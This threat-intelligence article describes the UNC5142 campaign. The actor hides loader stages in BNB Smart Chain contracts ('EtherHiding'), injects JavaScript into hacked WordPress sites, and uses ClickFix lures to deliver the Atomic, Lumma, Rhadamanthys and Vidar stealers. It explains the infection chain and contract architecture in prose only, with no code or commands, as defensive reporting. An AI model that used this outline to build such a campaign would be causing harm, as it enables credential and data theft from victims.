A threat actor known as UNC5142 has been abusing blockchain smart contracts to facilitate the distribution of several information-stealing malware strains, such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar. This campaign targets both Windows and Apple macOS operating systems. UNC5142 is characterized by exploiting vulnerable WordPress websites and utilizing a technique dubbed ‘EtherHiding,’ which obscures malicious code or data by placing it on a public blockchain, specifically the BNB Smart Chain (BSC). First documented in late 2023, EtherHiding allows the malware to blend in with legitimate Web3 traffic, making the operation more resilient to detection and takedown efforts. Google Threat Intelligence Group (GTIG) reported having flagged about 14,000 web pages with injected JavaScript tied to UNC5142 as of mid-2025, suggesting a wide-ranging, indiscriminate attack.
The core mechanism of these attacks revolves around a multi-stage JavaScript downloader called CLEARSHORT, which is an assessed variant of the ClearFake framework. The attack begins with a first-stage JavaScript malware injected into compromised WordPress sites’ files or database. This script interacts with a malicious smart contract on the BSC blockchain to retrieve the second-stage payload. The smart contract, in turn, fetches an encrypted CLEARSHORT landing page from an external server, often a Cloudflare .dev page. This landing page uses the ClickFix social engineering tactic, deceiving victims into running malicious commands in the Windows Run dialog or the macOS Terminal app, ultimately leading to system infection with a stealer.
The infection chain adapts to the target’s operating system. On Windows, the malicious command executes an HTML Application (HTA) file, which then drops a PowerShell script to fetch the final, encrypted stealer payload from platforms like GitHub or MediaFire. Crucially, this script runs the stealer directly in memory, avoiding writing the file to the disk to bypass defenses. For attacks observed targeting macOS users, the ClickFix decoy prompts the victim to execute a bash command on the Terminal. This command downloads a shell script which then uses the curl command to retrieve the Atomic Stealer payload from a remote server, completing the infection.
Over the past year, UNC5142’s campaigns have shown considerable evolution, moving from a single-contract system to a more sophisticated three-smart contract architecture beginning in late 2024. This new design is based on the legitimate proxy pattern—a highly efficient Router-Logic-Storage setup—with each contract having a specific job. This structure provides operational agility, allowing the threat actors to rapidly update critical components like the landing page URL or decryption key by simply altering the mutable data within the smart contract, all without modifying the JavaScript on the compromised WordPress websites. This process is surprisingly cost-effective, costing only a small network fee for each update.
GTIG’s analysis of the blockchain infrastructure revealed the use of two distinct sets of smart contracts: a primary Main infrastructure established in late 2024, and a parallel Secondary infrastructure funded in early 2025. The Main infrastructure serves as the core campaign backbone, while the Secondary one appears to be a more tactical deployment, likely used to test new lures, support activity surges, or simply enhance overall resilience. Given the consistent operational tempo, the high volume of hacked websites, the frequent updates to the infection chain, and the diversity of distributed malware payloads, UNC5142 is assessed to have achieved a notable degree of success with its ongoing financially motivated operations.
Reference:
